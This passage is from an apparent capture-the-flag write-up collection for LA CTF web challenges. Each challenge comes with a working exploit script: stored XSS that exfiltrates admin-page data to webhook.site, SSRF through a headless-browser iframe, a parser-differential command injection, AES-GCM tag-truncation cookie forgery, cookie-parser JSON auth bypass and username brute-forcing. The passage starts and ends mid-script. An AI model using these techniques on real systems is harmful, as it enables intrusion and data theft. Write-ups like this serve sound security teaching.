    return f"{challenge_url}/append?content=&url={urllib.parse.quote(evil_url, safe='')}"

def submit_to_bot(bot_url, exploit_url):
    data = urllib.parse.urlencode({'url': exploit_url, 'g-recaptcha-response': ''}).encode()
    req = urllib.request.Request(f"{bot_url}/append-note", data=data, method='POST')
    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
    try:
        resp = urllib.request.urlopen(req)
        return resp.status, resp.url
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get('Location', '')

def poll_ntfy(topic, timeout=90):
    print(f"[*] Polling ntfy.sh/{topic} for up to {timeout}s...")
    start, seen = time.time(), set()
    while time.time() - start < timeout:
        try:
            resp = urllib.request.urlopen(f"https://ntfy.sh/{topic}/json?poll=1", timeout=10)
            for line in resp.read().decode().strip().split('\n'):
                if not line: continue
                msg = json.loads(line)
                if msg['id'] not in seen:
                    seen.add(msg['id'])
                    print(f"[+] {msg['message']}")
                    if 'FLAG=' in msg['message']:
                        return msg['message']
        except Exception:
            pass
        time.sleep(3)

def main():
    challenge_url = sys.argv[1].rstrip('/')
    bot_url = sys.argv[2].rstrip('/')
    ntfy_topic = f"an-{secrets.token_hex(8)}"

    print(f"[*] Challenge: {challenge_url}")
    print(f"[*] Bot: {bot_url}")
    print(f"[*] Ntfy topic: {ntfy_topic}")

    exploit_url = make_exploit_url(challenge_url, ntfy_topic)
    print(f"[*] Exploit URL length: {len(exploit_url)}")

    print("[*] Submitting to admin bot...")
    status, location = submit_to_bot(bot_url, exploit_url)
    print(f"[*] Bot response: {status} -> {location}")

    result = poll_ntfy(ntfy_topic)
    if result and 'SECRET=' in result:
        secret = result.split('SECRET=')[1].strip()
        flag = urllib.request.urlopen(f"{challenge_url}/flag?secret={secret}").read().decode()
        print(f"[+] FLAG: {flag}")
    elif result:
        print(f"[+] {result}")

if __name__ == '__main__':
    main()
```

**Flag**

```
lactf{3V3n7U4LLy_C0N5I573N7_70_L34X}
```

### blogler

#### Description

The site hosts public user blog pages at `/blog/<username>`. If the user exists, the page renders their blog posts; if they do not exist, the server returns `404` with body `username does not exist`.

Goal: find the flag `lactf{...}`.

#### Solution

The intended weakness is simple user enumeration + content search:

1. Use the oracle on `GET /blog/<username>`:
   * Existing user: `200` and a real HTML blog page.
   * Non-existing user: `404` with body `username does not exist`.
2. Enumerate likely usernames (a dictionary wordlist is enough).
3. For each existing user page, search the HTML for the substring `lactf{`.

This quickly finds a public user named `exploiter` whose blog page contains the flag:

* `https://blogler.chall.lac.tf/blog/exploiter` -> `lactf{7m_g0nn4_bl0g_y0u}`

Solution code (async dictionary brute + flag grep):

```python
import asyncio
import re
from pathlib import Path

import aiohttp

BASE = "https://blogler.chall.lac.tf"
FLAG_RE = re.compile(r"lactf\{[^}]+\}")


def candidate_usernames() -> list[str]:
    # Any wordlist works. This one exists on many Linux systems.
    words = Path("/usr/share/dict/words").read_text(errors="ignore").splitlines()
    out = []
    for w in words:
        w = w.strip().lower()
        if not w:
            continue
        if not (1 <= len(w) <= 16):
            continue
        # Keep it simple: typical CTF usernames.
        if not re.fullmatch(r"[a-z][a-z0-9_-]*", w):
            continue
        out.append(w)
    return sorted(set(out))


async def worker(session: aiohttp.ClientSession, q: asyncio.Queue[str]) -> None:
    while True:
        u = await q.get()
        try:
            async with session.get(
                f"{BASE}/blog/{u}",
                timeout=aiohttp.ClientTimeout(total=10),
            ) as r:
                if r.status != 200:
                    continue
                txt = await r.text()
                if "username does not exist" in txt:
                    continue
                m = FLAG_RE.search(txt)
                if m:
                    print(m.group(0))
                    raise SystemExit(0)
        finally:
            q.task_done()


async def main() -> None:
    q: asyncio.Queue[str] = asyncio.Queue()
    for u in candidate_usernames():
        q.put_nowait(u)

    connector = aiohttp.TCPConnector(limit=200)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = [asyncio.create_task(worker(session, q)) for _ in range(80)]
        await q.join()
        for t in tasks:
            t.cancel()


if __name__ == "__main__":
    asyncio.run(main())
```

### clawcha

#### Description

The server runs a "claw machine" gacha. The `flag` item exists server-side but has probability `1e-15`, so you realistically only get it if you are the special owner user `r2uwu2` (the server bypasses the probability check for owners).

Authentication is via a signed cookie `username` (`cookie-parser` signed cookies).

#### Solution

The bug is a logic mismatch in `cookie-parser`: after verifying a signed cookie, it also tries to parse any cookie value starting with `j:` as JSON (the "JSON cookie" feature). The app then uses the *post-parsed* `req.signedCookies.username` for authentication.

So we can register a new user whose username is a JSON-cookie payload that parses to the *string* `r2uwu2`, e.g.:

`j: "r2uwu2"`

`cookie-parser` will:

1. Verify the signature for the raw value `j: "r2uwu2"` (valid, since the server signed it for us on `/login`).
2. Parse it as JSON (because it starts with `j:`), turning it into the string `r2uwu2`.

Now `req.signedCookies.username` becomes `r2uwu2`, the app loads the real owner object from its `users` map, and `/claw` will always succeed for `flag`.
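A rough Python model of cookie-parser's JSON-cookie step (an approximation for illustration, not the Node source):

```python
import json

def json_cookie(val: str):
    # cookie-parser's JSONCookie: after signature verification, any value
    # starting with "j:" is JSON-parsed; on failure the raw value is kept.
    if not val.startswith("j:"):
        return val
    try:
        return json.loads(val[2:])
    except ValueError:
        return val

assert json_cookie('j: "r2uwu2"') == "r2uwu2"   # JSON.parse ignores whitespace
assert json_cookie("alice") == "alice"
```

Registering `j: "r2uwu2"` and logging in thus yields a validly signed cookie that deserializes to the owner's username.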

Exploit script:

```python
#!/usr/bin/env python3
import os
import random
import requests

TARGET = "https://clawcha.chall.lac.tf"

def main() -> None:
    # cookie-parser treats values starting with "j:" as JSON and parses them.
    # JSON.parse ignores whitespace, so we can add random spaces to avoid collisions
    # if someone already registered a particular username string.
    spaces = " " * random.randint(1, 32)
    username = f'j:{spaces}"r2uwu2"'
    password = os.urandom(8).hex()

    s = requests.Session()

    r = s.post(f"{TARGET}/login", json={"username": username, "password": password}, timeout=15)
    r.raise_for_status()
    assert r.json().get("success") is True

    r = s.post(f"{TARGET}/claw", json={"item": "flag"}, timeout=15)
    r.raise_for_status()
    j = r.json()
    assert j.get("success") is True
    print(j["msg"])

if __name__ == "__main__":
    main()
```

Running it prints the flag from the server response.

### glotq

#### Description

The service provides `jq`, `yq`, and `xq` “as a service” via three endpoints:

* `POST /json`
* `POST /yaml`
* `POST /xml`

Each request contains a JSON/YAML/XML object with fields like `command` and `args`, and the server executes that command.

#### Solution

The core bug is that the server parses the request twice using *different* rules:

1. **Security middleware** decides how to parse the body based on the HTTP `Content-Type` header.
2. **Handler** decides how to parse the body based on the *endpoint path* (`/json` always uses JSON parsing, etc.).

Additionally, Go’s `encoding/json` matches JSON object keys to struct fields/tags **case-insensitively**, while the YAML parser used (`gopkg.in/yaml.v3` with `yaml:"command"`) is effectively **case-sensitive** for those keys.

So we can send a request to `/json` with `Content-Type: application/yaml`:

* The middleware YAML-unmarshals the body and sees only lowercase `command/args`, so we make those look safe (`jq`) and pass the allowlist.
* The `/json` handler JSON-unmarshals the *same* body, and because JSON matching is case-insensitive, we can provide capitalized `Command/Args` that override the effective values used by the handler.
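The key-matching differential can be sketched in Python (a model of the behavior described above; the real logic lives in Go's `encoding/json` and `gopkg.in/yaml.v3`):

```python
def json_field(items, tag):
    # Like encoding/json: keys match struct tags case-insensitively, and
    # when several keys match one field, the last one decoded wins.
    val = None
    for k, v in items:
        if k.lower() == tag.lower():
            val = v
    return val

def yaml_field(items, tag):
    # Like yaml.v3 with a lowercase tag: only the exact-case key matches.
    val = None
    for k, v in items:
        if k == tag:
            val = v
    return val

body = [("command", "jq"), ("args", ["-n", "1"]),
        ("Command", "man"), ("Args", ["-H/readflag", "jq"])]
assert yaml_field(body, "command") == "jq"   # middleware allowlist sees "jq"
assert json_field(body, "command") == "man"  # handler actually runs "man"
```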

We then execute the SUID helper `/readflag` (present in the container) by abusing `man`’s HTML mode:

* `man -H<browser> <page>` runs `<browser>` to display the HTML output.
* Setting the browser to `/readflag` runs it and prints `/flag.txt`.

Exploit payload (send to `/json` while lying about `Content-Type`):

```json
{
  "command": "jq",
  "args": ["-n", "1"],
  "Command": "man",
  "Args": ["-H/readflag", "jq"]
}
```

One-shot solve script:

```bash
#!/usr/bin/env bash
set -euo pipefail

URL="https://glotq-gkche.instancer.lac.tf"  # replace with your instance

payload='{"command":"jq","args":["-n","1"],"Command":"man","Args":["-H/readflag","jq"]}'

curl -fsS "$URL/json" \
  -X POST \
  -H 'Content-Type: application/yaml' \
  --data-binary "$payload"
```

This returns the flag in the `output` field.

### job-board

#### Description

The job board site has an internal (private) job posting whose description contains the flag. Applicants can submit a job application and then ask an admin recruiter (via an admin-bot) to view it.

#### Solution

The backend tries to HTML-escape user-controlled fields before inserting them into HTML templates, but the `htmlEscape()` implementation is incorrect: it only replaces the *first* occurrence of each special character (`&`, `<`, `>`, `"`, `'`).

In `app.js`:

* Applications are stored server-side and later rendered at `/application/:id`.
* The `why` field is inserted into `site/application.html` inside a `<p>WHY</p>`.
* The server calls `htmlEscape(why)`, but the buggy escaping lets us smuggle a real tag.

Because applications are persisted, this is a **stored XSS**. The admin bot logs in as the admin recruiter and then visits the URL we submit, so our XSS runs in the admin's browser context on `job-board.chall.lac.tf`.

**XSS construction**

We want the rendered HTML to contain a real element like:

```html
<img src=x onerror="...JS...">
```

But the server escapes the first `<`/`>`/`"` it sees.

So we intentionally include *two* of each delimiter, so the first gets escaped and the second remains real:

* Start with `"` so the first double-quote becomes `&quot;`, leaving later quotes intact.
* Include `>>` so the first `>` becomes `&gt;`, leaving the second `>` real.
* Include `<<` so the first `<` becomes `&lt;`, leaving the second `<` real and starting the `<img>` tag.

Payload prefix:

```
">><<img ...>
```
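A minimal model of the first-occurrence-only escape (a Python sketch, not the actual `htmlEscape()` from `app.js`) shows why the doubled delimiters survive:

```python
def buggy_escape(s: str) -> str:
    # Like a non-global str.replace: only the FIRST occurrence of each
    # special character gets escaped.
    for ch, ent in [("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"),
                    ('"', "&quot;"), ("'", "&#x27;")]:
        s = s.replace(ch, ent, 1)
    return s

out = buggy_escape('">><<img src=x onerror="alert(1)">')
assert out == '&quot;&gt;>&lt;<img src=x onerror="alert(1)">'
```

The second `<`, `>`, and `"` all pass through untouched, leaving a live `<img>` tag in the rendered page.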

**Exfiltration**

The JS in `onerror`:

1. Fetches `/` and extracts any UUID-looking IDs from the HTML.
   * In practice, the admin view includes a private job ID we cannot see as a normal user.
2. Fetches `/job/<uuid>` for each discovered ID.
3. Regex-searches the responses for `lactf{...}`.
4. Sends the flag out-of-band to a `webhook.site` endpoint using `fetch(..., {mode: 'no-cors'})`.

The only manual step is solving the admin-bot reCAPTCHA to get it to visit our application URL.

**Exploit code**

`solve.py` (runs locally; prints the URL to submit to the admin bot and then polls for the exfiltrated flag):

```python
#!/usr/bin/env python3
"""
Exploit for LA CTF job-board.

This does everything except solving the admin-bot reCAPTCHA. After running, copy
the printed application URL into the admin bot form.
"""

import re
import time
import requests

JOB_BOARD = "https://job-board.chall.lac.tf"
ADMIN_BOT = "https://admin-bot.lac.tf/job-board"

FLAG_RE = re.compile(r"lactf\{[^}]+\}")


def new_webhook_uuid() -> str:
    r = requests.post(
        "https://webhook.site/token",
        headers={"Accept": "application/json"},
        timeout=15,
    )
    r.raise_for_status()
    return r.json()["uuid"]


def get_public_job_ids() -> list[str]:
    r = requests.get(JOB_BOARD + "/", timeout=15)
    r.raise_for_status()
    return sorted(set(re.findall(r"/job/([0-9a-f-]{36})", r.text)))


def build_xss(webhook_uuid: str) -> str:
    """
    The server's htmlEscape() is buggy: it only replaces the first occurrence of
    &, <, >, ", and '.

    We exploit that by:
    - Starting with a `"` so the *first* quote is escaped and later quotes remain.
    - Adding `>>` so the *first* `>` is escaped and later `>` remains.
    - Adding `<<` so the *first* `<` is escaped and later `<` remains (starts a real tag).

    The resulting rendered HTML contains: <img ... onerror="..."> and runs JS
    when the admin recruiter views the application.
    """

    # Avoid single quotes entirely (the first one would be escaped to &#x27; and may break JS).
    js = (
        "(async function(){"
        f"var U=`https://webhook.site/{webhook_uuid}`;"
        "var S=function(d){fetch(U,{method:`POST`,mode:`no-cors`,body:d})};"
        "try{"
        "var t=await fetch(`/`).then(function(r){return r.text()});"
        "var f=t.match(/lactf\\{[^}]+\\}/);"
        "if(f){S(`flag:${f[0]}`);return;}"
        # Grab any UUIDs present in the HTML (admin view may include private jobs).
        "var ids=t.match(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/g)||[];"
        "var seen={};"
        "for(var i=0;i<ids.length;i++)seen[ids[i]]=1;"
        "for(var id in seen){"
        "try{var tj=await fetch(`/job/${id}`).then(function(r){return r.text()});"
        "var fj=tj.match(/lactf\\{[^}]+\\}/);if(fj){S(`flag:${fj[0]}`);return;}"
        "}catch(e){}"
        "}"
        "S(`done:no_flag ids:${Object.keys(seen).join()}`);"
        "}catch(e){S(`err:${e}`)}"
        "})()"
    )

    return f'">><<img src=x onerror="{js}">'


def submit_application(job_id: str, payload: str) -> str:
    r = requests.post(
        f"{JOB_BOARD}/application/{job_id}",
        data={"name": "aaa", "email": "a@b.co", "why": payload},
        timeout=15,
    )
    r.raise_for_status()
    m = re.search(r'href="(/application/[0-9a-f-]{36})"', r.text)
    if not m:
        raise RuntimeError("could not find application URL in response")
    return JOB_BOARD + m.group(1)


def poll_webhook_for_flag(webhook_uuid: str, timeout_s: int = 900) -> str | None:
    url = f"https://webhook.site/token/{webhook_uuid}/requests?sorting=newest"
    deadline = time.time() + timeout_s
    seen_req_ids: set[str] = set()

    while time.time() < deadline:
        try:
            r = requests.get(url, headers={"Accept": "application/json"}, timeout=15)
            r.raise_for_status()
            data = r.json().get("data") or []
            for req in data:
                rid = req.get("uuid")
                if not rid or rid in seen_req_ids:
                    continue
                seen_req_ids.add(rid)
                content = req.get("content") or ""
                m = FLAG_RE.search(content)
                if m:
                    return m.group(0)
                if content:
                    print("[webhook] content:", content[:400].replace("\n", "\\n"))
        except Exception:
            pass
        time.sleep(2)

    return None


def main() -> None:
    webhook_uuid = new_webhook_uuid()
    job_ids = get_public_job_ids()
    if not job_ids:
        raise RuntimeError("no public jobs found")

    payload = build_xss(webhook_uuid)
    app_url = submit_application(job_ids[0], payload)

    print("[*] Admin bot page (solve reCAPTCHA here):")
    print(ADMIN_BOT)
    print("[*] Submit this URL to the admin bot:")
    print(app_url)
    print("[*] Exfil webhook UUID (for debugging):", webhook_uuid)
    print("[*] Waiting for admin to visit and exfiltrate flag...")

    flag = poll_webhook_for_flag(webhook_uuid)
    if flag:
        print("[+] FLAG:", flag)
    else:
        print("[-] Timed out waiting for exfil.")


if __name__ == "__main__":
    main()
```

**Flag**

`lactf{c0ngr4ts_0n_y0ur_n3w_l7fe}`

### lactf-invoice-generator

#### Description

The site generates a PDF invoice from JSON input (`name`, `item`, `cost`, `datePurchased`). The PDF is rendered by a headless browser.

#### Solution

The backend builds an HTML template using user input directly (no escaping) and renders it with Puppeteer:

* `dist/invoice-generator/server.js` inserts `${name}`, `${item}`, `${datePurchased}` into HTML.
* `page.setContent(invoiceHTML, { waitUntil: "load" })` then `page.pdf(...)`.

In the provided deployment, there is an internal service named `flag` on the Docker network:

* `dist/flag/flag.js` serves `GET /flag` with `FLAG: <flag>`.
* `dist/docker-compose.yml` shows `invoice-generator` depends on `flag`, both on the same network.

Exploit: HTML-inject an `<iframe>` that loads `http://flag:8081/flag`. Since Puppeteer renders the HTML server-side (inside the container network), it can reach the internal `flag` host and the flag becomes visible in the rendered page, then embedded into the generated PDF.

One-shot exploit (replace `URL` with your instancer URL):

```bash
URL='https://lactf-invoice-generator-w01xc.instancer.lac.tf'
curl -fsS -X POST "$URL/generate-invoice" \
  -H 'Content-Type: application/json' \
  --data-binary '{
    "name":"<div>ACME</div><iframe src=\"http://flag:8081/flag\" style=\"width:100%;height:200px;border:0\"></iframe>",
    "item":"pens",
    "cost":"1",
    "datePurchased":"2026-01-01"
  }' \
  -o invoice.pdf

# Extract flag from the PDF
strings -a invoice.pdf | rg -o 'lactf\{[^}]+\}'
```

Reference solve script (does the same thing and extracts from bytes/strings output):

```python
#!/usr/bin/env python3
import re
import subprocess
import sys

import requests

def main():
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} <base_url>", file=sys.stderr)
        return 2
    base = sys.argv[1].rstrip("/")

    payload = {
        "name": '<div>ACME</div><iframe src="http://flag:8081/flag" style="width:100%;height:200px;border:0"></iframe>',
        "item": "pens",
        "cost": "1",
        "datePurchased": "2026-01-01",
    }

    r = requests.post(f"{base}/generate-invoice", json=payload, timeout=30)
    r.raise_for_status()
    pdf = r.content

    m = re.search(rb"lactf\{[^}]+\}", pdf)
    if m:
        print(m.group(0).decode())
        return 0

    # Fallback: run `strings` on the bytes.
    p = subprocess.run(
        ["strings", "-a"],
        input=pdf,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        check=True,
    )
    m = re.search(rb"lactf\{[^}]+\}", p.stdout)
    if not m:
        raise SystemExit("flag not found")
    print(m.group(0).decode())
    return 0

if __name__ == "__main__":
    raise SystemExit(main())
```

Flag obtained from the generated PDF: `lactf{plz_s4n1t1z3_y0ur_purch4s3_l1st}`

### mutation mutation

#### Description

The site claims the flag is “constantly mutating” and that you can get it by inspecting the page.

#### Solution

The server serves two different HTML pages based on `User-Agent`:

* A short decoy page (sent to `curl`-like UAs) that contains a fake `REAL_FLAG`.
* A much larger “real” page (sent to browser UAs) with heavily obfuscated JavaScript that computes the real flag string at runtime.

To solve, fetch the real page using a browser UA, extract the inline `<script>...</script>`, and execute it in Node with minimal DOM stubs. The script computes a constant `F` that is the real `lactf{...}` flag.

Code (one-shot extractor):

```bash
python3 - <<'PY'
import re, subprocess, tempfile, textwrap

UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
URL = "https://mutation-mutation.chall.lac.tf/"

html = subprocess.check_output(["curl", "-m", "30", "-sS", "-A", UA, URL]).decode("utf-8", "replace")
script = re.search(r"<script>([\s\S]*?)</script>", html).group(1)

runner = textwrap.dedent("""
    // Minimal browser stubs so the challenge script can run in Node.
    global.window = { outerWidth: 800, innerWidth: 800, outerHeight: 600, innerHeight: 600 };
    global.NodeFilter = { SHOW_COMMENT: 128 };

    const fakeParent = { insertBefore() {} };
    const fakeHtml = { parentNode: fakeParent };
    global.document = {
      documentElement: fakeHtml,
      addEventListener() {},
      createTreeWalker() { return { nextNode() { return false; }, currentNode: null }; },
      createComment(s) { return { nodeValue: String(s), remove() {} }; },
    };

    // Avoid infinite timers.
    global.setInterval = function() { return 0; };
""")

with tempfile.NamedTemporaryFile("w", suffix=".js", delete=False, encoding="utf-8") as f:
    f.write(runner)
    f.write(script)
    f.write("\nconsole.log(String(F));\n")
    path = f.name

flag = subprocess.check_output(["node", path]).decode("utf-8", "replace").strip()
print(flag)
PY
```

Resulting flag (note: contains Unicode confusables, emoji, and other non-ASCII characters; copy exactly):

```
lactf{с0nѕtаnt_mutаtі0n_1s_fun!_🧬_👋🏽_ІlІ1| ض픋ԡೇ∑ᦞ୞땾᥉༂↗ۑீ᤼യ⌃±❣Ӣ◼ௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌௌ}
```

### narnes-and-bobles

#### Description

The site is a bookstore. You can register/login, add books to your cart, and checkout to download a zip of your purchased books. One book is `Flag` (`flag.txt`) but costs `1000000`, while new users start with a balance of `1000`.

Goal: bypass the balance check to buy the `Flag` book and read the flag from the downloaded zip.

#### Solution

Relevant code is in `server.js`:

1. Books are loaded from `books.json` into a `Map` (`booksLookup`). One book has a **string** price:
   * `The Part-Time Parliament` has `"price": "10"` (string)
   * `Flag` has `"price": 1000000` (number)
2. `/cart/add` tries to prevent adding non-sample items you can’t afford:
   * It queries the sum of existing non-sample cart items via SQL `SUM(...) AS cartSum`.
   * It computes the cost of the items being added via JS:
     * `additionalSum = ... .map(...price...).reduce((l, r) => l + r, 0);`
   * It blocks if `additionalSum + cartSum > balance`.
3. Two JS/SQLite behaviors combine into a bypass:
   * When the cart is empty, SQLite `SUM(...)` returns `NULL`, which becomes JS `null`.
   * JS `+` is concatenation if either side is a string. If the first added product has price `"10"`, the reduce becomes a string:
     * `0 + "10" -> "010"` (string)
     * `"010" + 1000000 -> "0101000000"` (string)
   * Then the check becomes:
     * `additionalSum + cartSum` is `"0101000000" + null` => `"0101000000null"`
     * `"0101000000null" > 1000` converts to `Number("0101000000null")` => `NaN`
     * `NaN > 1000` is `false`, so the purchase is incorrectly allowed.
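
The coercion chain above can be checked offline. This is a small Python model of the relevant JavaScript `+`/`Number()` semantics (not the server code itself; `js_add`, `js_str`, and `js_number` are illustrative names):

```python
import math

def js_str(v):
    """JS stringification for the values we care about."""
    if v is None:
        return "null"
    return v if isinstance(v, str) else str(v)

def js_add(l, r):
    """Model JS `+`: string concatenation if either operand is a string."""
    if isinstance(l, str) or isinstance(r, str):
        return js_str(l) + js_str(r)
    return l + r

def js_number(v):
    """Model JS Number(): non-numeric strings become NaN."""
    try:
        return float(v)
    except (TypeError, ValueError):
        return math.nan

cart_sum = None  # empty cart: SQLite SUM(...) -> NULL -> JS null
# reduce((l, r) => l + r, 0) over prices ["10", 1000000]
additional_sum = js_add(js_add(0, "10"), 1000000)
assert additional_sum == "0101000000"
total = js_add(additional_sum, cart_sum)
assert total == "0101000000null"
# `total > 1000` coerces the string to NaN, and NaN > 1000 is false,
# so the "too expensive" branch is never taken.
assert not (js_number(total) > 1000)
```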

Exploit:

1. Register a new user (empty cart so `cartSum` is `null`).
2. In a single `/cart/add` request, add:
   * `The Part-Time Parliament` (price `"10"`, forces string concatenation)
   * `Flag` (price `1000000`) with `is_sample: false` for both.
3. Checkout and read `flag.txt` from the returned zip.

Exploit code (Python):

```python
#!/usr/bin/env python3
import io
import secrets
import zipfile

import requests

BASE = "https://narnes-and-bobles.chall.lac.tf"

PART_TIME_ID = "a3e33c2505a19d18"   # price is the string "10"
FLAG_ID = "2a16e349fb9045fa"        # price is 1000000


def main():
    s = requests.Session()

    username = "user" + secrets.token_hex(8)
    password = secrets.token_hex(16)

    # Register (creates a session cookie).
    r = s.post(
        f"{BASE}/register",
        data={"username": username, "password": password},
        allow_redirects=False,
        timeout=15,
    )
    r.raise_for_status()

    # Add both items in one request so cartSum is NULL->null.
    products = [
        {"book_id": PART_TIME_ID, "is_sample": False},
        {"book_id": FLAG_ID, "is_sample": False},
    ]
    r = s.post(f"{BASE}/cart/add", json={"products": products}, timeout=15)
    r.raise_for_status()

    # Checkout and extract flag.txt from the zip.
    r = s.post(f"{BASE}/cart/checkout", timeout=30)
    r.raise_for_status()

    zf = zipfile.ZipFile(io.BytesIO(r.content))
    flag = zf.read("flag.txt").decode().strip()
    print(flag)


if __name__ == "__main__":
    main()
```

### single-trust

#### Description

The app stores a JSON session object in a client cookie `auth`, encrypted with AES-256-GCM:

* plaintext: `{"tmpfile":"/tmp/pastestore/<32 hex chars>"}`
* cookie: `base64(iv).base64(authTag).base64(ciphertext)`

On each request it decrypts the cookie and uses `user.tmpfile` as the file to read/write. The flag is in `/flag.txt`.

#### Solution

Node (Ubuntu 20.04 `nodejs` package, v10.19.0) accepts *truncated* GCM tags via `decipher.setAuthTag()`. Since the server does not enforce a 16-byte tag length, we can send a 1-byte tag, reducing authentication strength to 8 bits. We can then brute-force the tag byte for any modified ciphertext (at most 256 requests).

We cannot directly change the 32 unknown hex bytes (we don't know their plaintext, so we can't compute XOR deltas there). But we can avoid needing them:

1. Keep bytes 28..59 (the unknown hex) unchanged.
2. Rewrite only the first 28 bytes of plaintext from:
   * `{"tmpfile":"/tmp/pastestore/` to:
   * `{"tmpfile":"/flag.txt","x":"`
3. Leave the last 2 bytes unchanged (`"}`), so the unknown 32 bytes become the value of `"x"`, and `tmpfile` becomes `/flag.txt`.

Because AES-GCM encryption is XOR with a keystream, we can transform known plaintext bytes by XORing the ciphertext with `P0 ^ P1` for those positions. After modifying the ciphertext, we brute-force a 1-byte tag until the server accepts it and returns `/flag.txt` in the page.
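
The bit-flip identity and the resulting plaintext can be sanity-checked offline with a toy XOR keystream (GCM's underlying CTR encryption behaves identically for this purpose; the 32-byte `unknown` value is a stand-in for the real unknown hex chars):

```python
import json
import os

P0 = b'{"tmpfile":"/tmp/pastestore/'
P1 = b'{"tmpfile":"/flag.txt","x":"'
unknown = b"0123456789abcdef0123456789abcdef"  # stand-in for the 32 unknown hex chars
pt0 = P0 + unknown + b'"}'

ks = os.urandom(len(pt0))                   # toy keystream standing in for AES-CTR
ct = bytes(p ^ k for p, k in zip(pt0, ks))  # "encrypt"

# Flip only the first 28 ciphertext bytes: C'[i] = C[i] ^ P0[i] ^ P1[i]
ctm = bytearray(ct)
for i in range(len(P0)):
    ctm[i] ^= P0[i] ^ P1[i]

pt1 = bytes(c ^ k for c, k in zip(ctm, ks))  # "decrypt"
obj = json.loads(pt1)
assert obj["tmpfile"] == "/flag.txt"  # file read now targets /flag.txt
assert obj["x"] == unknown.decode()   # unknown bytes absorbed into a harmless field
```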

Exploit code (prints the flag):

```py
import base64
import re
import urllib.parse
import requests

BASE = "https://single-trust.chall.lac.tf"

# Known plaintext prefix in the original cookie (28 bytes)
P0 = b'{"tmpfile":"/tmp/pastestore/'
# Desired prefix (also 28 bytes): set tmpfile to /flag.txt and start a filler field "x"
P1 = b'{"tmpfile":"/flag.txt","x":"'
assert len(P0) == len(P1) == 28

s = requests.Session()
r = s.get(BASE + "/", timeout=15)
r.raise_for_status()

# Cookie value is URL-encoded in Set-Cookie; decode then split on '.'
auth = urllib.parse.unquote(s.cookies.get("auth"))
iv_b64, tag_b64, ct_b64 = auth.split(".")
iv = base64.b64decode(iv_b64)
ct = base64.b64decode(ct_b64)

# Bit-flip first 28 bytes of ciphertext to change plaintext P0 -> P1
ctm = bytearray(ct)
for i in range(28):
    ctm[i] ^= P0[i] ^ P1[i]
ctm = bytes(ctm)

# Brute-force 1-byte GCM tag
for guess in range(256):
    tag1 = bytes([guess])
    forged = ".".join(
        [
            base64.b64encode(iv).decode(),
            base64.b64encode(tag1).decode(),
            base64.b64encode(ctm).decode(),
        ]
    )
    r = requests.get(BASE + "/", cookies={"auth": forged}, timeout=15)
    m = re.search(r"lactf\{[^}]+\}", r.text)
    if m:
        print(m.group(0))
        break
```

### the-trial

#### Description

The site shows a slider that generates a 4-letter word, then sends it to `POST /getflag` as `application/x-www-form-urlencoded` with the parameter `word`.

#### Solution

View source / DevTools shows the client-side JS builds a 4-letter string from an alphabet and submits it via:

`fetch("/getflag", { method: "POST", body: "word=<generated>" })`

The backend doesn't enforce the slider; it just checks the posted value. Bypass the UI and submit `word=flag` directly:

```bash
curl -sS -X POST 'https://the-trial.chall.lac.tf/getflag' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'word=flag'
```

Python equivalent:

```python
#!/usr/bin/env python3
import re
import requests

BASE = "https://the-trial.chall.lac.tf"

def get_flag() -> str:
    r = requests.post(f"{BASE}/getflag", data={"word": "flag"}, timeout=20)
    r.raise_for_status()
    m = re.search(r"lactf\{[^}]+\}", r.text)
    if not m:
        raise RuntimeError(f"flag not found in response: {r.text!r}")
    return m.group(0)

if __name__ == "__main__":
    print("flag:", get_flag())
```

Flag: `lactf{gregor_samsa_awoke_from_wait_thats_the_wrong_book}`

### bobles-and-narnes

#### Description

This challenge is a simple bookstore web app with a cart. The `Flag` “book” costs `$1000000`, but new accounts only have `$1000`. Checkout returns a ZIP of the purchased files, and the real flag is in `flag.txt`.

#### Solution

The key bug is in `POST /cart/add`:

* The server computes how much to charge using the **request body**:
  * `additionalSum = products.filter(p => !+p.is_sample).map(price).sum()`
  * So setting `is_sample: true` on the flag item makes it *not* counted (no “too poor” rejection).
* But it inserts cart rows using Bun SQL’s object bulk insert:
  * `` await db`INSERT INTO cart_items ${db(cartEntries)}` ``
  * When `db([...])` is given an array of objects, the INSERT column list is taken from the **first object** only.
  * If the first object omits `is_sample`, the INSERT omits the `is_sample` column for *all* rows, so every inserted row gets `is_sample = NULL` (even later objects that included `is_sample`).

At checkout:

* `const path = item.is_sample ? samplePath : fullPath`
* `NULL` is falsy, so `item.is_sample` selects the **full** file path (`flag.txt`), giving the real flag.
* The balance can go negative on checkout (no “enough money” check there), so we just need to pass the `/cart/add` check.
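
A minimal Python model of the two behaviors together (column list taken from the first object, then `NULL` being falsy at checkout); this mimics the described Bun SQL semantics, not its real implementation:

```python
def bulk_insert(rows):
    """Model of the described db([...]) behavior: the INSERT column list
    is derived from the first object's keys only; other keys are dropped."""
    cols = list(rows[0].keys())
    return cols, [{c: row.get(c) for c in cols} for row in rows]

products = [
    {"book_id": "509d8c2a80e495fb"},                     # cheap book, is_sample omitted
    {"book_id": "2a16e349fb9045fa", "is_sample": True},  # flag book, skipped by price check
]
cols, inserted = bulk_insert(products)
assert cols == ["book_id"]  # is_sample column omitted for *every* row

# At checkout is_sample reads back as NULL (None here), which is falsy,
# so the full file path is served for both rows.
for item in inserted:
    path = "sample.txt" if item.get("is_sample") else "flag.txt"
    assert path == "flag.txt"
```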

Exploit strategy:

1. Add two products in one request:
   * Product 0: any cheap book, **omit** `is_sample` entirely (so the INSERT omits that column).
   * Product 1: the flag book with `is_sample: true` (so the price check skips charging it).
2. Checkout and unzip `flag.txt`.

Solution code (`solve_final.py`):

```python
#!/usr/bin/env python3
import io
import time
import uuid
import zipfile

import requests

BASE = "https://bobles-and-narnes.chall.lac.tf"

FLAG_BOOK_ID = "2a16e349fb9045fa"
CHEAP_BOOK_ID = "509d8c2a80e495fb"  # $20


def _post(session: requests.Session, path: str, *, json=None, data=None, timeout=20):
